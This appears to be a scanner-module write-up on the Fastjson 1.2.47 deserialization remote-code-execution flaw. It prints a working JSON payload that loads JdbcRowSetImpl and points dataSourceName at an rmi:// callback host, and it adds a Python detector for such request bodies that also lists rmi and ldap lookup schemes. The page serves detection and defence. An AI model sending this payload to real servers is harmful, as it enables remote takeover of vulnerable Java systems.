By kannthu
The "Fastjson 1.2.47 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.47, a Java library for JSON processing. This vulnerability allows for remote code execution through deserialization. The severity of this vulnerability is classified as critical, with a CVSS score of 10.
This module was authored by zh.
If successfully exploited, this vulnerability can allow an attacker to execute arbitrary code on the target system. This can lead to a complete compromise of the system, enabling unauthorized access, data theft, or further attacks.
The module sends an HTTP POST request to the target system with a specific payload that triggers the deserialization vulnerability. The payload includes a malicious object that exploits the vulnerability in Fastjson 1.2.47.
Here is an example of the payload:
POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://<InteractionURL>/Exploit",
        "autoCommit":true
    }
}
The module includes matching conditions to determine if the vulnerability is present. It checks for specific responses from the target system, such as a "Bad Request" or a status code of 400. Additionally, it verifies that the interaction protocol used is not DNS-based.
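For the defending side, one way to flag request bodies shaped like the payload above before they reach a Fastjson parser. This is an added example, not part of the Vidoc module or the original page; the function names, rule labels, and the inclusion of ldap:// alongside the page's rmi:// are assumptions.

```python
import json

# Assumption: schemes treated as remote JNDI-style lookups. The page's payload
# uses rmi://; ldap:// and ldaps:// are included here as a generalization.
REMOTE_SCHEMES = ("rmi://", "ldap://", "ldaps://")

# Request body copied from the page (placeholders left as-is).
PAGE_PAYLOAD = """{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://<InteractionURL>/Exploit", "autoCommit": true}
}"""
# Constructed benign body for comparison.
BENIGN_BODY = '{"user": {"name": "alice", "homepage": "https://example.org"}}'


def walk(node, path="$"):
    """Yield (path, obj) for every JSON object, however deeply nested."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def inspect_body(body):
    """Return (path, rule, detail) findings for one HTTP request body."""
    try:
        doc = json.loads(body)  # parsing also decodes unicode-escaped keys
    except ValueError:
        # Not strict JSON: fall back to a raw substring check.
        return [("$", "unparsed-type-hint", "@type")] if "@type" in body else []
    findings = []
    for path, obj in walk(doc):
        type_name = obj.get("@type")
        if not isinstance(type_name, str):
            continue
        findings.append((path, "type-hint", type_name))
        if type_name == "java.lang.Class" and isinstance(obj.get("val"), str):
            findings.append((path, "class-ref", obj["val"]))
        for key, value in obj.items():
            if isinstance(value, str) and value.lower().startswith(REMOTE_SCHEMES):
                findings.append((path, "remote-lookup", key))
    return findings


if __name__ == "__main__":
    for finding in inspect_body(PAGE_PAYLOAD):
        print(finding)
```

Any "type-hint" finding on an endpoint that has no reason to accept polymorphic JSON is worth logging; "class-ref" together with "remote-lookup" in one body matches the structure of the payload shown on this page.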
For more information, refer to the GitHub repository.